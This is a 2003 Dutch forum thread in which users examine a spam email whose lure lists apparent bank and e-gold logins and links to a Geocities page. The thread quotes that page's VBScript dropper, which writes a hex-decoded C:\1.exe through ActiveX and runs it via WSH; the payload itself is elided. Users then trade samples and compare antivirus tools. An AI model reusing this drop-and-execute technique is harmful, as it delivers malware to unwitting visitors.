virus, seller god

Pagina: 1
Acties:

  • radial
  • Registratie: Augustus 2000
  • Laatst online: 06-09 12:35

radial

Watch out

Topicstarter
Vandaag kreeg ik verschilende keren een mailtje van Leo67@hotmail.com

met attachment mtbank.exe

[mail]
Hi Teresa!

Your Data:

MtBank LOGIN: teresa672
MtBank PASSWORD: K2DIrL0y

E-gold: 232385
pass : T64Jkd7W

E-Bullion: A43467
pass : G74kL1Oer

http://www.geocities.com/seller*god

Best regards,
Your Leo mailto: Leo67@hotmail.com
[mail]

Wat het precies doet weet ik zo niet maar de source zag er uit alsof er exe file aangemaakt zou moeten worden.
Aangezien ik vbscripting uit heb staan gebeurde er niks,


Wie weet hier meer over? Op google was niet echt wat te vinden.

[ Voor 4% gewijzigd door radial op 29-07-2003 22:05 . Reden: link ff verkreupelt ]

20xSF170s - ozo


  • kamerplant
  • Registratie: Juli 2001
  • Niet online
Tja, dit lijkt me eigenlijk best wel duidelijk een virus. :o
Hier doet het ook niks, waarschijnlijk omdat m'n systeem up2date is. Ik zal zeggen: Submit de info eens bij verschillende antivirus-bedrijven als je scanner hem niet detecteerd. :)

[ Voor 10% gewijzigd door kamerplant op 29-07-2003 20:21 ]

🌞🍃


  • KO
  • Registratie: December 2001
  • Laatst online: 12-11-2023

KO

Wel leuk dit is de code....

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<HTML>
<BODY>
<SCRIPT language=VBScript>
Set Y=Document.CreateElement("object")
Document.Body.AppendChild Y
Y.Style.Display="none"
Y.Code="com.ms.activeX.ActiveXComponent"
Window.SetTimeout "X()",10000
Function X
Y.SetClsId("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Y.CreateInstance
set S = Y.GetObject()
set F = S.CreateTextFile("C:\1.exe",1)


<-- hele lap tekst ->


F.Close()
Set Y=Document.CreateElement("object")
Document.Body.AppendChild Y
Y.Style.Display="none"
Y.Code="com.ms.activeX.ActiveXComponent"
Window.SetTimeout "R()",500
End Function
Function H(HE01)
Dim HE02
Dim HE03
HE02 = ""
For HE03 = 1 To Len( HE01 ) Step 2
HE02 = HE02 & Chr( "&h" & Mid( HE01,HE03,2))
Next
H = HE02
End Function
Function R()
Y.SetClsId("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Y.CreateInstance
set S = Y.GetObject()
S.Run("C:\1.exe")
End Function
</SCRIPT>
Error
</BODY>
</HTML>
<!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet>
<script language="JavaScript">var PUpage="76001065"; var PUprop="geocities"; </script><script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"></script><script language="JavaScript" src="http://www.geocities.com/js_source/ygIELib9.js?v3"></script><script language="JavaScript">var yviContents='http://us.toto.geo.yahoo.com/toto?s=76001065&l=NE&b=1&t=1059502981';yviR='us';yfiEA(0);</script><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript>[img]"http://visit.webhosting.yahoo.com/visit.gif?us1059502981"[/img]</noscript>
[img]"http://geo.yahoo.com/serv?s=76001065&t=1059502981"[/img]
<!-- w22.geo.scd.yahoo.com compressed/chunked Tue Jul 29 11:23:01 PDT 2003 -->

Yesterday Is History. Today Is A Gift. Tomorrow Is Mystery


Verwijderd

Kun je hem naar kav@home.nl sturen?
Als de mail scanner van @home hem niet vangt(Kaspersky), dan hebben de Kaspersky users morgen protectie ertegen :).

Verwijderd

Volgens mij is het gewoon een popup scriptje!

  • Aetje
  • Registratie: September 2001
  • Laatst online: 18-12-2025

Aetje

Troubleshooting met HAMERRR

Dat stuk script genereert een bestand en opent het. Grote kans dat 't een virus is.

Forget your fears...
...and want to know more...


  • KO
  • Registratie: December 2001
  • Laatst online: 12-11-2023

KO

Verwijderd schreef op 29 July 2003 @ 20:28:
Volgens mij is het gewoon een popup scriptje!
Met dit? :?
code:
1
set F = S.CreateTextFile("C:\1.exe",1)
:Y)

Yesterday Is History. Today Is A Gift. Tomorrow Is Mystery


Verwijderd

@ radial2000

Je mail server lijkt executables te blocken, kun je de file niet zippen oid?

Edit: Zal wel een bug in de coding van de url zitten, want er gebeurde hier niks behalve dan dat het venster niet kon killen.

SSM had wel wat gezegd als er een onbekende app had willen executen, zo niet al eerder.

[ Voor 55% gewijzigd door Verwijderd op 29-07-2003 20:38 ]


  • radial
  • Registratie: Augustus 2000
  • Laatst online: 06-09 12:35

radial

Watch out

Topicstarter
Verwijderd schreef op 29 juli 2003 @ 20:36:
@ radial2000

Je mail server lijkt executables te blocken, kun je de file niet zippen oid?

Edit: Zal wel een bug in de coding van de url zitten, want er gebeurde hier niks behalve dan dat het venster niet kon killen.

SSM had wel wat gezegd als er een onbekende app had willen executen, zo niet al eerder.
Jups was ik ff vergeten :-) maar hij is onderweg

Ben benieuwd wat grisoft (AVG) ervan zegt,hopelijk ook een snelle update

20xSF170s - ozo


  • gomaster
  • Registratie: Februari 2002
  • Laatst online: 22:20
Die dingen komen dagelijks op de markt. Zolang je een goeie virusscan hebt EN een goed verstand gebruikt gebeurd er niks :)

Verwijderd

radial2000 schreef op 29 juli 2003 @ 20:39:
[...]


Jups was ik ff vergeten :-) maar hij is onderweg

Ben benieuwd wat grisoft (AVG) ervan zegt,hopelijk ook een snelle update
Thanks for the file.

Heb even gescanned met: KAV, McAfee, NAV, CA, F-Secure en RAV.

Verbazingwekkend genoeg is RAV de enige die hem vindt, als TrojanDropper:Win32/Snart.A

Ben echt verbaasd, want normaal gesproken is KAV alleenheerser als het over trojandroppers gaat..

Waarschijnlijk morgenvroeg pas bericht van Kaspersky, heb hem naar Rusland gestuurd en normaal gesproken zijn ze daar nu vanalles aan het doen, maar niet op de incoming e-mails aan het letten.

Verwijderd

http://www.geocities.com / seller_god

Ik zou ff die link in de openingspost kreupel maken voordat er perongeluk op wordt geklikt.

  • Aetje
  • Registratie: September 2001
  • Laatst online: 18-12-2025

Aetje

Troubleshooting met HAMERRR

Klik er rustig op. Yahoo geeft er een page not found op.

Forget your fears...
...and want to know more...


Verwijderd

Men probeert die EXE file gewoon via een ActiveX component {0D43FE01-F093-11CF-8940-00A0C9054228} SCRRUN (ScreenSaverStarter) of ActiveX component {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} WSH (WindowsScriptingHost) te starten.

Niks nieuws onder de zon wat dat betreft.

[ Voor 3% gewijzigd door Verwijderd op 30-07-2003 04:32 ]


  • kamerplant
  • Registratie: Juli 2001
  • Niet online
Verwijderd schreef op 29 July 2003 @ 20:47:
[...]


Thanks for the file.

Heb even gescanned met: KAV, McAfee, NAV, CA, F-Secure en RAV.

Verbazingwekkend genoeg is RAV de enige die hem vindt, als TrojanDropper:Win32/Snart.A

Ben echt verbaasd, want normaal gesproken is KAV alleenheerser als het over trojandroppers gaat..

Waarschijnlijk morgenvroeg pas bericht van Kaspersky, heb hem naar Rusland gestuurd en normaal gesproken zijn ze daar nu vanalles aan het doen, maar niet op de incoming e-mails aan het letten.
Zo veel verbaast me dat niet. Toen ik nog actief een virusscanner (KAV) gebruikte herkende het ook op dat moment onbekende virussen terwijl andere dat niet deden. :)
KAV is echt een goede scanner, qua herkenning van virussen en qua client. :)

🌞🍃


Verwijderd

hmm.. die heb ik gister ook gekregen, alleen herkende NAV um wel?

Verwijderd

Als ik de afzender niet ken en men stuurt een exe, bat of pif-bestandje mee dan gaat ie regelrecht naar de prullenbak. sim-pel

Verwijderd

Verwijderd schreef op 29 July 2003 @ 20:47:
[...]


Thanks for the file.

Heb even gescanned met: KAV, McAfee, NAV, CA, F-Secure en RAV.

Verbazingwekkend genoeg is RAV de enige die hem vindt, als TrojanDropper:Win32/Snart.A

Ben echt verbaasd, want normaal gesproken is KAV alleenheerser als het over trojandroppers gaat..

Waarschijnlijk morgenvroeg pas bericht van Kaspersky, heb hem naar Rusland gestuurd en normaal gesproken zijn ze daar nu vanalles aan het doen, maar niet op de incoming e-mails aan het letten.
Bij sophos is Snart.A helemaal niet bekend :?
Weet je zeker dat RAV niet heel creatief een virus heeft verzonnen :P

Aw wacht, zie dat hier al een aantal keren die TrojanDropper gevangen is, zal dus wel niet goed gezocht hebben :D

[ Voor 9% gewijzigd door Verwijderd op 30-07-2003 11:55 ]


  • Nulnulnix
  • Registratie: Januari 2001
  • Laatst online: 05-06 13:04

Nulnulnix

BOFH

En net zo simpel: bestanden met meer dan 1 extensie de prullenbak in...


Oh ja, klik hier eens op voor meer info: http://vil.nai.com/vil/content/v_99957.htm

[ Voor 39% gewijzigd door Nulnulnix op 30-07-2003 11:50 ]

We have just one world, but we live in different ones...


Verwijderd

Afaik herkent NAV hem niet, ik ken wel iemand die hem gisteren naar SARC heeft gestuurd maar zo snel zijn ze daar meestal niet.
Zo veel verbaast me dat niet. Toen ik nog actief een virusscanner (KAV) gebruikte herkende het ook op dat moment onbekende virussen terwijl andere dat niet deden.
RAV detecteerde hem al, KAV pas sinds de laatste daily.
Bij sophos is Snart.A helemaal niet bekend
Weet je zeker dat RAV niet heel creatief een virus heeft verzonnen
Aw wacht, zie dat hier al een aantal keren die TrojanDropper gevangen is, zal dus wel niet goed gezocht hebben
Sophos is een overschat, te duur stukje software imho.
Kijk maar eens voor de gein op de site, die nieuwste randon daar listed, die wordt al zo'n dikke 2,5 maand door KAV gedetecteerd...(om maar eens wat te noemen).

Verwijderd

Verwijderd schreef op 30 July 2003 @ 12:07:
Sophos is een overschat, te duur stukje software imho.
Kijk maar eens voor de gein op de site, die nieuwste randon daar listed, die wordt al zo'n dikke 2,5 maand door KAV gedetecteerd...(om maar eens wat te noemen).
site: kaspersky.com
Phrase to find: "Randon-R"
Found: 0
site: sophos.com
Phrase to find: "Randon-R"
9 matches
Hetgene dat je op de sophos site ziet is een ide om herkenning te verbeteren en om extra info te geven.
Hoelang sophos dit virus al ziet kun je hier echter niet uit halen.

[ Voor 26% gewijzigd door Verwijderd op 30-07-2003 12:16 ]


Verwijderd

Marketing is niet Kaspersky's (sterke) punt, als het dat wel was had allang iedereen Kaspersky op z'n pc draaien..maw: die site is ruk, zie de viruslist generator.
Daarnaast had je ook op randon.n moeten zoeken :).

Dat is geen ide om herkenning te verbeteren, want dan had er zo heel mooi 'updated' moeten staan.(zoals bij graps, webber, etc).

Maar heb je de sample daadwerkelijk in bezit?
Aw wacht, zie dat hier al een aantal keren die TrojanDropper gevangen is, zal dus wel niet goed gezocht hebben
Heb je enig idee hoeveel trojandroppers het wel niet geeft? Omdat daar een paar keer wat tussen staat mag je dat echt niet aannemen..

Verwijderd

Verwijderd schreef op 30 July 2003 @ 12:20:
Marketing is niet Kaspersky's (sterke) punt, als het dat wel was had allang iedereen Kaspersky op z'n pc draaien..maw: die site is ruk, zie de viruslist generator.
Daarnaast had je ook op randon.n moeten zoeken :).
Phrase to find: "randon.n"
Found: 0
:D
Dat is geen ide om herkenning te verbeteren, want dan had er zo heel mooi 'updated' moeten staan.(zoals bij graps, webber, etc).

Maar heb je de sample daadwerkelijk in bezit?

[...]

Heb je enig idee hoeveel trojandroppers het wel niet geeft? Omdat daar een paar keer wat tussen staat mag je dat echt niet aannemen..
Heb hier een aantal bestanden die sopos AV ziet als W32/Snart.A.

Of een ide voor herkenning is kun je niet aan het "updated" zien, ik had b.v. een tijdje geleden een false positive van Troj/IRCBot-C, toen is er een ide gekomen om de herkenning te verbeteren.
Sophos AV kende de trojan dus wel degelijk voordat er een ide voor uit kwam.

Je hebt volgens mij trouwens wel gelijk dat de W32/Randon-R ide voor herkenning is.

Zal ook eens een KAV licentie nemen, zit nu nog een beetje in "welke virusscanner is voor mij de beste" fase :P

Maar vooral vanwege het feit dat KAV 71603 virussen trojans e.d. in de database heeft zitten en Sophos AV 83520 ben ik nog niet zo zeker van de geweldigheid van KAV.
Ook is de automatische centrale update van sophos toch wel erg handig :)

Maaruh, dit gaat volgens mij een beetje richting "welke virusscanner is de beste" :P

[ Voor 36% gewijzigd door Verwijderd op 30-07-2003 12:37 ]


  • klaasbaas
  • Registratie: December 2002
  • Laatst online: 06-02-2024
Verwijderd schreef op 29 July 2003 @ 20:27:
Kun je hem naar kav@home.nl sturen?
Als de mail scanner van @home hem niet vangt(Kaspersky), dan hebben de Kaspersky users morgen protectie ertegen :).
Zonder hiermee de thread te willen verzanden in "kan je hem mij even sturen....?" doe ook ik toch dat verzoek.

Leuke test voor mijn zojuist geinstalleerde amavis-ng.

Mail zeer svp naar klaasjan@denouden-it.nl

Verwijderd

@ _knight_

Ik zei toch al dat die site sjrot is, moet ik nu een screenshot gaan maken of geloof je me zo? :)
(nog meer) Off-topic: je wil in principe een AV die 0 of 1 virussen kent, dat zou betekenen dat de rest met heuristics enzo worden gevonden.(KAV herkent een stuk of 50 spybots met generic detection terwijl NOD, Norman er 50 sigs voor nodig hebben, dat telt ook weer mee.
Nummers zeggen echt niets, F-Prot herkent 90 000+ virussen en doet het ongeveer het slechtst als ik m'n collectie scan :).

@ klaas-baas

Ik kan hem alleen nog maar password protected verzenden, en dan heeft je mail scanner erg weinig nut meer...

  • Reptile209
  • Registratie: Juni 2001
  • Laatst online: 23:30

Reptile209

- gers -

klaas-baas schreef op 30 July 2003 @ 12:31:
[...]
Mail zeer svp naar klaasjan[at maildomain]denouden-it.nl
offtopic:
klaas-baas, kweenie of je ook spam spaart, maar ik zou 'm niet zo neerzetten :)

Zo scherp als een voetbal!


Verwijderd

Verwijderd schreef op 30 July 2003 @ 12:48:
Ik zei toch al dat die site sjrot is, moet ik nu een screenshot gaan maken of geloof je me zo? :)
(nog meer) Off-topic: je wil in principe een AV die 0 of 1 virussen kent, dat zou betekenen dat de rest met heuristics enzo worden gevonden.(KAV herkent een stuk of 50 spybots met generic detection terwijl NOD, Norman er 50 sigs voor nodig hebben, dat telt ook weer mee.
Nummers zeggen echt niets, F-Prot herkent 90 000+ virussen en doet het ongeveer het slechtst als ik m'n collectie scan :).
Om maar ff offtopic te blijven dan :)
Je hebt er idd gelijk in dat je een AV wilt die gewoon ziet of iets een virus is of niet.

Maar support is toch ook vrij belangrijk, ik ben geen virus expert en heb ook niet echt de ambitie om dat te worden.
Dus als er onverhoopt een virus oid door de scanner heen glipt, dan is het wel handig dat je 24/7 terug kunt vallen op mensen die wel verstand van zaken hebben.
Je betaald idd wel wat meer, maar dan weet je wel zeker dat je binnen 2 uur weer aan de slag kunt.
Of Kaspersky nu echt zoveel beter is dan Sophos kan ik op dit moment niet beoordelen.
Maargoed, ik ga gewoon een licentie nemen en dan tesen met die handel :P

Maar, als ik het goed begrijp heb jij dus een virus collectie waar je av's op gaat testen ?

Verwijderd

Maar, als ik het goed begrijp heb jij dus een virus collectie waar je av's op gaat testen ?
Mwhoa, ik kijk tegenwoordig meer of de echt nieuwe zut gevonden wordt.
Tijd geleden had ik een stuk of 50 virussen van kazaa afgehaald, KAV vond ze allemaal, McAfee eentje niet, en de rest van de populairdere AVs vond er niet meer dan 8(acht).
(NAV werd op dat moment in tijd niet getest)

Ik was teleurgesteld op z'n minst...

Moet nog eens kijken of ik in de vakantie wel aan Sophos kan wennen, heb het ooit eens even gedraaid maar ik vond de hele interface niet fijn, allemaal een beetje fuzzy imho.
Pagina: 1